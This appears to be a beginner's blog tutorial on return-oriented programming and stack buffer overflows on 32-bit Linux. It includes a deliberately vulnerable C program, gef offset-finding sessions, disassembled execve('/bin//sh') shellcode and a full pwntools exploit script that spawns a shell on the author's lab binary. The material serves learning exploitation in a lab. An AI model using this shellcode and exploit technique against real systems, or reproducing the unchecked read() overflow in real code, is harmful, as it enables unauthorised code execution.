Preface

My advisor recently assigned me a task that involves reproducing SGX-related attacks that use ROP (Return-Oriented Programming). Since I had zero prior experience with binary exploitation or reverse engineering, I had to learn ROP from scratch. There are plenty of tutorials online, but very few truly start from the ground up. This post documents what I learned, organized so that a complete beginner can follow along.

My primary learning resource was a Chinese blog series called “Step by Step ROP” (一步一步学ROP):

  1. https://wooyun.js.org/drops/%E4%B8%80%E6%AD%A5%E4%B8%80%E6%AD%A5%E5%AD%A6ROP%E4%B9%8Blinux_x64%E7%AF%87.html
  2. http://drops.xmd5.com/static/drops/tips-6597.html
  3. https://github.com/zhengmin1989/ROP_STEP_BY_STEP

Those articles assume a fair amount of background knowledge about binary execution and compilation, which isn’t great for beginners (or for someone as green as I was at the time). This post only assumes familiarity with basic x86 assembly instructions. All experiments are performed on Linux.

Background

What Is ROP

ROP stands for Return-Oriented Programming, and the name is fairly self-explanatory: programming built around the ret instruction. ret does one thing, which is effectively pop IP: it pops the value at the top of the stack into the instruction pointer, so the program jumps there (i.e., “returns” from a function). If we control the contents of the stack, we control where each ret jumps. By chaining short instruction sequences that each end in ret, we can make the program run code of our choosing.
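As a rough illustration of this idea, the following toy model (plain Python, not real machine code) treats the stack as a list and ret as a pop into the instruction pointer. The gadget addresses 0x1000 and 0x2000, the register dictionary, and the function names are all made up for this sketch.

```python
# Toy model of ret-driven control flow. All addresses and gadgets are hypothetical.

def pop_eax(regs, stack):
    # Stands in for the instruction sequence: pop eax ; ret
    regs["eax"] = stack.pop()

def pop_ebx(regs, stack):
    # Stands in for the instruction sequence: pop ebx ; ret
    regs["ebx"] = stack.pop()

GADGETS = {0x1000: pop_eax, 0x2000: pop_ebx}

def run_chain(memory_order_chain):
    """Execute ret repeatedly over an attacker-controlled stack.

    memory_order_chain lists the stack words starting at the top of the stack.
    """
    stack = list(reversed(memory_order_chain))  # list.pop() now takes the stack top
    regs = {"eax": 0, "ebx": 0}
    visited = []
    while stack:
        ip = stack.pop()                   # ret: pop the stack top into ip
        if ip not in GADGETS:
            visited.append(("crash", ip))  # no code at that address, like a segfault
            break
        visited.append(("exec", ip))
        GADGETS[ip](regs, stack)           # the gadget consumes its own operand
    return regs, visited

regs, visited = run_chain([0x1000, 11, 0x2000, 0x41414141])
print(regs, visited)
```

Every value in the chain is just data on the stack, yet it decides which code runs and what ends up in the registers.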

Stack

[Figure: memory layout of a running program]

The figure shows the memory layout of a running program. The stack grows from high addresses toward low addresses: push decrements the stack pointer, pop increments it. A stack buffer overflow occurs when a write to a buffer on the stack runs past the end of the buffer and overwrites the data stored above it (at higher addresses), which includes the saved return address of the current function. If such a vulnerability exists, we can control that part of the stack and craft return addresses to hijack program execution.
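The overwrite can be sketched with a simulated stack frame. This is a simplified model under stated assumptions: the frame holds only a 16-byte buffer, a saved ebp, and a return address (real frames may contain padding and other saved registers), and the addresses are invented.

```python
import struct

BUF_SIZE = 16  # toy buffer size, chosen only for this sketch

def make_frame(saved_ebp, ret_addr):
    # Index 0 is the lowest address (start of buf); the return address sits highest.
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<II", saved_ebp, ret_addr))

def unchecked_read(frame, data):
    # Mimics reading more bytes than the buffer holds: nothing stops the copy
    # at BUF_SIZE, so it continues into saved ebp and the return address.
    n = min(len(data), len(frame))
    frame[:n] = data[:n]

def return_address(frame):
    # The return address lives just above buf and the 4-byte saved ebp.
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]

frame = make_frame(saved_ebp=0xFFFFD000, ret_addr=0x08048500)
before = return_address(frame)

# 16 bytes fill buf, 4 more clobber saved ebp, the last 4 replace the return address.
unchecked_read(frame, b"A" * (BUF_SIZE + 4) + struct.pack("<I", 0xDEADBEEF))
after = return_address(frame)
print(hex(before), hex(after))
```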

Parameter Passing

Why do we need to understand parameter passing? Remember, our goal is to execute desired code after ret. To achieve this, calling system functions is essential—for example, system("/bin/sh") spawns a shell for us. But we can’t just call system; we also need to pass the argument "/bin/sh". Once we understand how arguments are passed, we can construct a stack overflow that arranges the calling convention correctly.

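x86 and x64 handle parameter passing differently. On 32-bit x86 (the cdecl convention used by GCC on Linux), all parameters are pushed onto the stack, from right to left. On x64 (the System V AMD64 ABI), the first six integer or pointer parameters are passed in the registers rdi, rsi, rdx, rcx, r8, and r9, in that order; any remaining parameters are pushed onto the stack. (In the x86-64 listing below, the 32-bit halves esi, edx, ecx, r8d, and r9d appear because the arguments are ints.) Let’s verify this.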

Our simple test program—printf with 9 arguments:

#include<stdio.h>

int main(){
    printf("there are 8 digits here: %d, %d, %d, %d, %d, %d, %d, %d", 1, 2, 3, 4, 5, 6, 7, 8);
    return 1;
}

To view the generated assembly:

$ gcc -S ./printf8.c [-m32]

The -m32 flag is optional and generates 32-bit assembly.

x86

        .file   "x86simple.c"
        .text
        .section        .rodata
        .align 4
.LC0:
        .string "there are 8 digits here: %d, %d, %d, %d, %d, %d, %d, %d"
        .text
        .globl  main
        .type   main, @function
main:
.LFB0:
        .cfi_startproc
        leal    4(%esp), %ecx
        .cfi_def_cfa 1, 0
        andl    $-16, %esp
        pushl   -4(%ecx)
        pushl   %ebp
        .cfi_escape 0x10,0x5,0x2,0x75,0
        movl    %esp, %ebp
        pushl   %ebx
        pushl   %ecx
        .cfi_escape 0xf,0x3,0x75,0x78,0x6
        .cfi_escape 0x10,0x3,0x2,0x75,0x7c
        call    __x86.get_pc_thunk.ax
        addl    $_GLOBAL_OFFSET_TABLE_, %eax
        subl    $12, %esp
        pushl   $8
        pushl   $7
        pushl   $6
        pushl   $5
        pushl   $4
        pushl   $3
        pushl   $2
        pushl   $1
        leal    .LC0@GOTOFF(%eax), %edx
        pushl   %edx
        movl    %eax, %ebx
        call    printf@PLT
        addl    $48, %esp
        movl    $1, %eax
        leal    -8(%ebp), %esp
        popl    %ecx
        .cfi_restore 1
        .cfi_def_cfa 1, 0
        popl    %ebx
        .cfi_restore 3
        popl    %ebp
        .cfi_restore 5
        leal    -4(%ecx), %esp
        .cfi_def_cfa 4, 4
        ret
        .cfi_endproc

Notice that all parameters, both the integers 1 through 8 and the address of the format string, are pushed onto the stack from right to left, so the format string ends up on top. Lines starting with “.” are assembler directives or local labels and can be ignored.

x86-64

        .file   "print8.c"
        .text
        .section        .rodata
        .align 8
.LC0:
        .string "there are 8 digits here: %d, %d, %d, %d, %d, %d, %d, %d"
        .text
        .globl  main
        .type   main, @function
main:
.LFB0:
        .cfi_startproc
        pushq   %rbp
        .cfi_def_cfa_offset 16
        .cfi_offset 6, -16
        movq    %rsp, %rbp
        .cfi_def_cfa_register 6
        subq    $8, %rsp
        pushq   $8
        pushq   $7
        pushq   $6
        movl    $5, %r9d
        movl    $4, %r8d
        movl    $3, %ecx
        movl    $2, %edx
        movl    $1, %esi
        leaq    .LC0(%rip), %rdi
        movl    $0, %eax
        call    printf@PLT
        addq    $32, %rsp
        movl    $1, %eax
        leave
        .cfi_def_cfa 7, 8
        ret
        .cfi_endproc

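Here we can see that 8, 7, and 6 are pushed onto the stack, while the format string and the integers 1 through 5 are placed in rdi, esi, edx, ecx, r8d, and r9d. The movl $0, %eax before the call is specific to variadic functions such as printf: al tells the callee how many vector registers carry arguments, which is zero here.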
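The two listings can be summarized by a small helper that reports where each integer or pointer argument ends up. This is only a sketch: the function name and the "stack[i]" labels are my own, and it ignores floating-point and struct arguments, which follow additional rules.

```python
# Integer/pointer argument registers of the System V AMD64 ABI, in order.
SYSV_AMD64_INT_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def arg_locations(num_args, arch):
    """Return the location of each argument, in source order.

    stack[0] is the slot closest to the top of the stack at the time of the call.
    """
    if arch == "x86":
        # cdecl: everything goes on the stack, pushed right to left,
        # so the first argument ends up on top.
        return [f"stack[{i}]" for i in range(num_args)]
    if arch == "x86-64":
        in_regs = SYSV_AMD64_INT_REGS[:num_args]
        spilled = max(0, num_args - len(SYSV_AMD64_INT_REGS))
        return in_regs + [f"stack[{i}]" for i in range(spilled)]
    raise ValueError(f"unknown arch: {arch}")

# printf(fmt, 1, 2, 3, 4, 5, 6, 7, 8) has nine arguments in total.
names = ["fmt"] + [str(i) for i in range(1, 9)]
for arch in ("x86", "x86-64"):
    print(arch, dict(zip(names, arg_locations(len(names), arch))))
```

For the x86-64 case the last three entries are stack slots holding 6, 7, and 8, which matches the three pushq instructions in the listing.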

Protection Mechanisms

ASLR (Address Space Layout Randomization) is the system-level protection. The per-binary protections can be checked with the checksec command (included in the pwntools Python package):

➜  rop checksec ./a.out                                                                    
[*] '/home/ya0guang/Code_obo/rop/a.out'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

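Arch indicates the target architecture. RELRO makes relocation data such as the GOT read-only after loading, either partially or fully. Stack reports whether stack canaries are compiled in. NX marks the stack and other data pages as non-executable. PIE means the executable itself is position-independent, so ASLR can load it at a random base address.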

To disable (or enable) system-level ASLR:

# Disable ASLR
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
# Enable ASLR
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
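To check which mode is currently active, the same file can be read back. The sketch below uses my own function names, and the mode descriptions paraphrase the kernel's sysctl documentation.

```python
from pathlib import Path

# Meaning of the values accepted by /proc/sys/kernel/randomize_va_space.
ASLR_MODES = {
    "0": "disabled",
    "1": "partial (stack, mmap base, vDSO)",
    "2": "full (partial plus heap)",
}

def describe_aslr(raw):
    """Map the raw file content to a human-readable description."""
    return ASLR_MODES.get(raw.strip(), "unknown")

def current_aslr(path="/proc/sys/kernel/randomize_va_space"):
    """Read the current setting; returns 'not available' on non-Linux systems."""
    p = Path(path)
    return describe_aslr(p.read_text()) if p.exists() else "not available"

print(current_aslr())
```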

Hands-On Practice

This section primarily follows the “Step by Step ROP” experiments. I strongly recommend installing gef as a GDB enhancement for debugging.

x86 ROP 101

Using the code from the GitHub repo mentioned above:

#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function() {
        char buf[128];
        read(STDIN_FILENO, buf, 256);
}

int main(int argc, char** argv) {
        vulnerable_function();
        write(STDOUT_FILENO, "Hello, World\n", 13);
}

To compile with minimal protections (making exploitation easier):

gcc -fno-stack-protector -z execstack -no-pie -o level1 level1.c -m32
# The original article used:
gcc -fno-stack-protector -z execstack -o level1 level1.c

The original tutorial is about four years old, and compiler defaults have changed since then: as the checksec output below shows, the original command now produces a 64-bit binary with PIE enabled, whereas the repo’s binary is 32-bit without PIE. This difference cost me an entire evening of debugging. Pass -no-pie to match, and remember to add -m32 when experimenting on a 64-bit system.

[*] '/home/ya0guang/Code_obo/ROP_STEP_BY_STEP/linux_x86/level1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments                                    
➜  linux_x86 git:(master) ✗ gcc -fno-stack-protector -z execstack -o level1 level1.c
➜  linux_x86 git:(master) ✗ checksec ./level1                                       
[*] '/home/ya0guang/Code_obo/ROP_STEP_BY_STEP/linux_x86/level1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
➜  linux_x86 git:(master) ✗ gcc -fno-stack-protector -z execstack -no-pie -o level1 level1.c -m32
➜  linux_x86 git:(master) ✗ checksec ./level1                                                    
[*] '/home/ya0guang/Code_obo/ROP_STEP_BY_STEP/linux_x86/level1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

The vulnerability in vulnerable_function is obvious: read attempts to read 256 bytes into a 128-byte buffer, which can cause a stack overflow. Let’s use GDB (with gef) to test this.

Finding the Overflow Offset

Open the program in GDB. Use pattern create 150 to generate a 150-byte de Bruijn pattern string. Run the program with r, paste the pattern as input, and observe the resulting segmentation fault.

The crash address is 0x6261616b. This value came from our pattern string: the overflow overwrote the saved return address, and ret popped this value into the instruction pointer. The program crashed because that address is not mapped to valid code. pattern search 0x6261616b reports an offset of 140, meaning the saved return address begins 140 bytes after the start of our input. When constructing our payload, we need to place our desired return address at offset 140.

A note on return addresses: when call executes, the CPU pushes the return address (typically the next instruction after call) onto the stack, then jumps. So after call, the stack top contains the return address, followed by function arguments.

$ gdb ./level1
gef➤  pattern create 150
[+] Generating a pattern of 150 bytes
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabma
[+] Saved as '$_gef0'
gef➤  r
Starting program: /home/ya0guang/Code_obo/ROP_STEP_BY_STEP/linux_x86/level1 
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabma

Program received signal SIGSEGV, Segmentation fault.
0x6261616b in ?? ()
...
gef➤  pattern search 0x6261616b
[+] Searching '0x6261616b'
[+] Found at offset 140 (little-endian search) likely

While gef’s output is verbose, it’s incredibly informative.
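For readers curious how the offset lookup works, here is a sketch using only the standard library. The generator is the textbook de Bruijn construction over the lowercase alphabet with 4-byte windows. It reproduces the pattern shown in the session above, but it is my own illustration and not gef's actual implementation; the names pattern_create and pattern_offset are borrowed for readability.

```python
import string
import struct
from itertools import islice

def de_bruijn(alphabet, n):
    """Yield a sequence in which every length-n window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def pattern_create(length, n=4):
    return "".join(islice(de_bruijn(string.ascii_lowercase, n), length)).encode()

def pattern_offset(value, length=150):
    # The crash address holds 4 pattern bytes read as a little-endian integer,
    # so pack it back into bytes before searching.
    needle = struct.pack("<I", value)
    return pattern_create(length).find(needle)

print(pattern_create(16))
print(pattern_offset(0x6261616B))
```

Because every 4-byte window is unique, the crash address identifies exactly one position in the input.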

Building the Payload

Let’s start by building a payload using shellcode. What is shellcode? Simply put, it’s code that gives you a shell! So how do we construct it? Currently, we can control 140 bytes of input plus a return address. We want the program to ret into our controlled input buffer, where our shellcode resides. A popular approach is calling system("/bin/sh"), but that’s for our next exercise (ret2libc). For now, we’ll use the shellcode from the tutorial:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

The tutorial doesn’t explain what this does, so let’s disassemble it:

    xor eax, eax    ; eax = 0
    push eax        ; push 4 zero bytes (string terminator)
    push 0x68732f2f ; push "//sh"
    push 0x6e69622f ; push "/bin"; esp now points to "/bin//sh\0"
    mov ebx, esp    ; ebx = filename = "/bin//sh"
    push eax        ; push NULL
    mov edx, esp    ; edx = envp = [NULL]
    push ebx        ; push pointer to filename
    mov ecx, esp    ; ecx = argv = [filename, NULL]
    mov al, 11      ; eax = 11 (sys_execve)
    int 0x80        ; trigger syscall
    ; source: http://www.expku.com/shellcode/8015.html

Much more readable, right? To understand this, read from the bottom up. int 0x80 triggers interrupt 0x80, which is essentially a special function call: on 32-bit Linux, software interrupt 0x80 enters the kernel to execute a syscall. The syscall number is taken from eax, and the arguments from ebx, ecx, and edx. The shellcode only writes al (the low 8 bits of eax) because eax was already zeroed by xor, and the shorter encoding avoids null bytes in the shellcode. The observant reader may notice that the pushed values appear reversed; that’s due to little-endian byte order. Don’t worry about this, since pwntools handles the conversion for you.
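The byte-order point can be checked directly. The helper below is a hypothetical name of my own; it packs the two pushed immediates as little-endian words and lays them out the way they end up in memory.

```python
import struct

def bytes_at_esp(*pushed_immediates):
    """Bytes found at esp after pushing the given 32-bit values in order."""
    # The last value pushed sits at the lowest address, so it comes first in memory.
    return b"".join(struct.pack("<I", imm) for imm in reversed(pushed_immediates))

# The shellcode pushes 0x68732f2f first, then 0x6e69622f.
path = bytes_at_esp(0x68732F2F, 0x6E69622F)
print(path)
```

Each immediate looks reversed in the disassembly because its least significant byte is stored at the lowest address.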

Using a syscall table for 32-bit Linux, we find that syscall 11 is sys_execve. Looking at its source (from an older kernel version):

asmlinkage int sys_execve(struct pt_regs regs)
{
	int error;
	char * filename;
	filename = getname((char *) regs.ebx);
	error = PTR_ERR(filename);
	if (IS_ERR(filename))
		goto out;
	error = do_execve(filename, (char **) regs.ecx, (char **) regs.edx, &regs);
	if (error == 0)
		current->ptrace &= ~PT_DTRACE;
	putname(filename);
out:
	return error;
}

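The shellcode pushes “/bin//sh” followed by a null terminator onto the stack (the doubled slash is harmless and pads the path to 8 bytes, i.e. exactly two pushes). A pointer to this string goes into ebx as the filename argument of sys_execve, with argv in ecx and envp in edx. The kernel then executes /bin/sh, giving us a shell.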

Our payload structure is straightforward:

payload = shellcode + padding to reach 140 bytes + shellcode’s start address

Feed this payload as user input and it will be executed.
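The layout can be sketched with the standard library alone, with struct.pack("<I", ...) standing in for the 32-bit little-endian packing step. The function name build_payload and the address passed to it are placeholders for illustration; the real buffer address is determined in the next section.

```python
import struct

RET_OFFSET = 140  # offset of the saved return address, found with the pattern search

shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

def build_payload(buf_addr, offset=RET_OFFSET):
    """shellcode + padding up to the return address + address of the buffer."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    padding = b"A" * (offset - len(shellcode))
    return shellcode + padding + struct.pack("<I", buf_addr)

payload = build_payload(0xAAAAAAAA)  # placeholder address
print(len(shellcode), len(payload))
```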

Finding the Start Address

This largely follows the Step by Step ROP x86 guide. Note that on Ubuntu 18.04 LTS, the stack addresses seen when the program is launched through pwntools may differ slightly from those seen when it is run directly, so I recommend producing the core dump from the pwntools run itself.

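from pwn import *

# 25-byte execve("/bin//sh") shellcode from the tutorial
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

p = process("./level1")

# Start address of buf. Use any placeholder (e.g. 0xaaaaaaaa) for the first run,
# then replace it with the address recovered from the core dump.
ret = 0xffffcea0

# Layout: shellcode, padding up to offset 140, then the new return address.
# p32() packs the address as 4 little-endian bytes.
payload = shellcode + b'A' * (140 - len(shellcode)) + p32(ret)

p.send(payload)
# Hand the terminal over to the spawned shell
p.interactive()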

Enable core dumps, run the exploit once with a placeholder address, then open the resulting core file in GDB:

ulimit -c unlimited
sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern'

➜  linux_x86 git:(master) ✗ python ./pwn1.py
[+] Starting local process './level1': pid 4757
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ sodaod
[*] Process './level1' stopped with exit code -11 (SIGSEGV) (pid 4757)
[*] Got EOF while sending in interactive
➜  linux_x86 git:(master) ✗ gdb ./level1 /tmp/core.1570062471.4757 
Core was generated by `./level1'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xaaaaaaaa in ?? ()
gef➤  x/10s $esp-144
0xffffcea0:     "1\300Ph//shh/bin\211\343P\211\342S\211\341\260\v̀", 'A' <repeats 115 times>, "\252\252\252\252P\317\377\377"
...
gef➤  quit
➜  linux_x86 git:(master) ✗ python ./pwn1.py                     
[+] Starting local process './level1': pid 4816
[*] Switching to interactive mode
$ whoami
ya0guang
$  

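On the first run, use any address for ret (0xaaaaaaaa in the transcript above). When the program crashes, open the core dump in GDB. At the moment of the crash, ret has already popped the 4-byte return address, so esp points 140 + 4 = 144 bytes past the start of buf; examining $esp-144 therefore shows the start of the buffer, here 0xffffcea0. Put that address into ret, run again, and we’ve got a shell. Pwned! Note that this only works while ASLR is disabled; otherwise the stack address changes on every run.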
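The address arithmetic is small enough to write down. In this sketch the function name is my own, and the esp value is the one implied by the transcript (0xffffcea0 + 144), not a value printed there.

```python
def buffer_start(esp_after_crash, ret_offset=140, addr_size=4):
    """Start of the overflowed buffer, given esp right after the faulting ret."""
    # ret has already popped the return address, so esp sits just past it.
    return esp_after_crash - (ret_offset + addr_size)

print(hex(buffer_start(0xFFFFCF30)))
```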